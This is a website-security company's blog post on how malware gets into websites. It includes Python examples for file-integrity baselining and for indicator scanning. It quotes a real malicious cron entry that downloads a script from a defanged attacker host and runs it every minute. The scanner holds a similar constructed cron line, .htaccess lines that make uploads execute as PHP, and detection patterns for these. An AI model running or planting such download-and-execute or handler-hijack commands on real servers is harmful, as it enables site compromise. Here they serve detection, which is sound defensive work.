How Malware Enters Your Website
Almost since the inception of the Internet, malware infections have continued to be the biggest nuisance faced by a site owner. With an ever-increasing number of sites making up the World Wide Web, malware infections are becoming more and more common. In this article, we’ll discuss what malware is, the different types we’ve come across, the methods used to inject malware into a site, and how you can harden/protect your site against these methods.
What is malware?
So what exactly is malware? Malware is short for “malicious software”: a file or piece of code, usually delivered over a network, that does something the site owner never intended. Its behavior is limited only by what the attacker wants and by the access the exploited vulnerability grants. Generally, the intention is to abuse the site’s resources without visibly damaging the site: if a site is broken or disabled, the attacker will usually not be able to achieve their goals. The damage it inflicts includes redirecting visitors to spammy sites, using the website’s resources to host phishing pages, filling the website with links to spammy and disreputable websites, stealing customers’ credit card numbers, or degrading the site. All of this can have a hugely negative effect on your website’s reputation and SEO. There are different types of malware, such as the following:
- Credit card skimmer
- Drive-by download
- Backdoor
How Malware Spreads
The age-old question that website owners usually ask is “how did this infection happen?” However, to answer this question, you must first identify the attack. Malware can be found in some of the most obscure places, but here are the most common locations where we found it:
- Content Management System (CMS) Core Integrity Files
- Site root directory
- Theme files
- Plugin/extension files
- Index file
Malware is injected primarily through software vulnerabilities, third-party integrations, and login credentials obtained through various tactics. How the infection is able to exploit your website and the level of access it gains to your environment depend on the type of vulnerability it exploits and on the mitigation and protection mechanisms in place, so this varies from infection to infection. It is important to note that re-infections can occur if no post-hack adjustments are made to the site: malware can still be injected without administrator rights (e.g. through backdoors), and once a site is compromised it can be installed without the victim’s knowledge. To reduce the risk of your site being re-infected with malware, skip to our section on post-hack prevention.
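One practical way to keep watch over the locations listed above (core files, the site root, theme and plugin files, the index file) is to record a cryptographic baseline of every file under the site root while the site is known to be clean, and compare the live tree against that baseline later. The following Python script is an added example, not a tool from this article or its authors; the small site layout it builds (index.php, wp-config.php, a theme functions.php) and the two changes it then makes are constructed purely for the demonstration.

```python
"""Baseline integrity check for a site root (added example, not the article's own tool)."""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """Return the SHA-256 hex digest of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every regular file under root (as a relative POSIX path) to its digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_manifests(baseline: dict, current: dict) -> dict:
    """Classify differences: files added since the baseline, removed, or changed."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),
        "removed": sorted(base_keys - cur_keys),
        "modified": sorted(k for k in base_keys & cur_keys if baseline[k] != current[k]),
    }


def save_manifest(manifest: dict, path: Path) -> None:
    """Persist the baseline as JSON; keep this file outside the web root."""
    Path(path).write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(path: Path) -> dict:
    return json.loads(Path(path).read_text())


def demo() -> dict:
    """Constructed scenario: clean site, baseline taken, then two hypothetical changes."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "public_html"
        (site / "wp-content" / "themes" / "demo").mkdir(parents=True)
        (site / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
        (site / "wp-config.php").write_text("<?php define('DB_NAME', 'example');\n")
        (site / "wp-content" / "themes" / "demo" / "functions.php").write_text("<?php // theme\n")

        # Baseline is stored beside, not inside, the web root so it is never served or hashed.
        baseline_path = Path(tmp) / "baseline.json"
        save_manifest(build_manifest(site), baseline_path)

        # Hypothetical changes a later scan should surface (constructed, not real malware):
        # a line appended to the index file, and a hidden PHP file dropped under uploads.
        with (site / "index.php").open("a") as fh:
            fh.write("<?php /* injected line */\n")
        uploads = site / "wp-content" / "uploads"
        uploads.mkdir()
        (uploads / ".cache.php").write_text("<?php /* dropped file */\n")

        return compare_manifests(load_manifest(baseline_path), build_manifest(site))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Regenerate the baseline after every legitimate update, keep a copy off the server, and treat any modified core file or any new PHP file under an upload directory as something to inspect before deciding whether a backup restore is enough.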
What Malware Looks Like
As mentioned earlier, malware can appear in many forms. Our server-side parser is regularly updated with new signatures discovered when attackers write new malware to exploit new vulnerabilities, sometimes 0-day (zero-day) vulnerabilities. For example, here is a recent malware infection in a jQuery file we encountered:
Another type of malware we found in the wp-content folder for WordPress was a backdoor script which appeared as such:
As you can see, the code in these files is usually wrapped in multiple layers of obfuscation, and it is often accompanied by .htaccess files that deny PHP from running in the website environment:
Order Allow,Deny
Allow from all
We can even detect malware in cron jobs on a hosting server. For example:
MAILTO=""
* * * * * wget -q -O xxxd hxxp://hello.hahaha666[.]xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/websitefolder/public_html 811-5 && rm -f xxxd
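The three artefacts just shown (obfuscated PHP, .htaccess directives that change how PHP executes, and a cron entry that fetches and runs a script every minute) all lend themselves to the kind of signature-style review the parser above performs. The Python scanner below is an added example, not the parser described in this article; the indicator regexes are narrow heuristics of my own, and the PHP, .htaccess and crontab samples it scans are constructed, with a placeholder host standing in for a real one.

```python
"""Indicator scan over constructed samples (added example, not the article's own scanner)."""
import re

# Each entry: (indicator name, compiled regex). A hit means "review this line",
# not "this is malware"; these are deliberately narrow heuristics.
PHP_INDICATORS = [
    ("eval-of-decoded-payload",
     re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("dynamic-code-exec", re.compile(r"\b(assert|create_function)\s*\(", re.I)),
    ("long-base64-blob", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")),
]
HTACCESS_INDICATORS = [
    # A handler/type that makes Apache execute image or text uploads as PHP.
    ("php-handler-for-non-php-ext",
     re.compile(r"^\s*Add(Handler|Type)\s+\S*php\S*\s+.*\.(jpg|jpeg|png|gif|txt|ico)\b", re.I)),
    # A file silently included before/after every PHP request.
    ("auto-prepend-file", re.compile(r"^\s*php_value\s+auto_(prepend|append)_file\b", re.I)),
]
CRON_INDICATORS = [
    # Fetch tool followed by an interpreter in the same command chain.
    ("download-then-execute",
     re.compile(r"\b(wget|curl)\b.*(&&|\|)\s*(/bin/)?(sh|bash|php|perl|python)\b", re.I)),
    # Every-minute schedule: weak on its own, corroborating next to the pattern above.
    ("every-minute-schedule", re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s")),
]


def scan(text: str, indicators) -> list:
    """Return (line_number, indicator_name) for every line matching any indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in indicators:
            if rx.search(line):
                hits.append((lineno, name))
    return hits


# Constructed samples. The base64 blob is filler, not a real payload.
PHP_SAMPLE = "\n".join([
    "<?php",
    "function demo_title() { return get_bloginfo('name'); }",
    "eval(base64_decode('" + "QUFB" * 40 + "'));",
])
HTACCESS_SAMPLE = "\n".join([
    "# benign: disable directory listing",
    "Options -Indexes",
    "# suspicious (constructed): treat image uploads as PHP",
    "AddHandler application/x-httpd-php .jpg",
    "php_value auto_prepend_file /tmp/.x.php",
])
CRON_SAMPLE = "\n".join([
    'MAILTO=""',
    "0 3 * * * /usr/bin/php /home/site/public_html/wp-cron.php",
    "* * * * * wget -q -O x hxxp://placeholder-host[.]example/x && chmod 0755 x && /bin/sh x && rm -f x",
])


def scan_samples() -> dict:
    """Run each sample through the matching indicator set."""
    return {
        "php": scan(PHP_SAMPLE, PHP_INDICATORS),
        "htaccess": scan(HTACCESS_SAMPLE, HTACCESS_INDICATORS),
        "cron": scan(CRON_SAMPLE, CRON_INDICATORS),
    }


if __name__ == "__main__":
    for kind, hits in scan_samples().items():
        for lineno, name in hits:
            print(f"{kind}:{lineno}: {name}")
```

Point `scan` at real files by reading them in (theme and plugin directories, every .htaccess under the web root, and `crontab -l` output for each hosting user) and review hits by hand; a legitimate minifier can produce long blobs, so the eval-of-decoded-payload and download-then-execute hits deserve attention first.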
These are just a few of the many types of malware we’ve encountered during cleanups recently, but are worth noting in case you’re looking to identify malware on your own server.
While identifying and removing malware is important, one of the most crucial steps in fixing a site is tracking down how the infection happened. Many site owners assume that if they simply restore a backup taken before the infection, everything will be fine again. However, this still does not fix the underlying vulnerability that allowed the hack to happen in the first place. The same philosophy applies to an insect infestation or to personal health: you may have gotten rid of the bugs or the disease, but understanding why they appeared in the first place helps prevent them from happening again and may cost less in the future.
One of the most important recommendations I give to clients is to update their CMS version (WordPress, Drupal, Joomla, Magento, etc.), as well as their themes and plugins.
Another recommendation is to make sure you keep plugins and user privileges to a minimum. Having too many plugins on a CMS can potentially make the site more vulnerable to infection, and having too many users with administrator privileges can be riskier.
Because database breaches have become more common, you always want to make sure all accounts have a strong password. Using a password generator together with a password manager is one of the most effective ways to ensure that your site is not brute-forced. For more information on securing your site, we recommend reading our guide.
Malware infections for the average business can be frightening and frustrating to experience, which is why our goal as a company is to educate and inform site owners on what to expect and how to overcome infections. As attacks continue to grow and become smarter, we must continue to be proactive and adapt to them. Since the average online user may not fully understand what is going on in the back-end, it is important for website owners to protect their customers’ sensitive information.
As the New Year approaches, make it a personal goal to monitor not only your personal safety as an online individual, but also your safety as an online business. In addition to the previous recommendations and tips for securing your site, we provide a WordPress plugin that actively monitors your site, as well as our Website Security Plan, which includes firewall protection. Get the peace of mind you need with your website security for the New Year.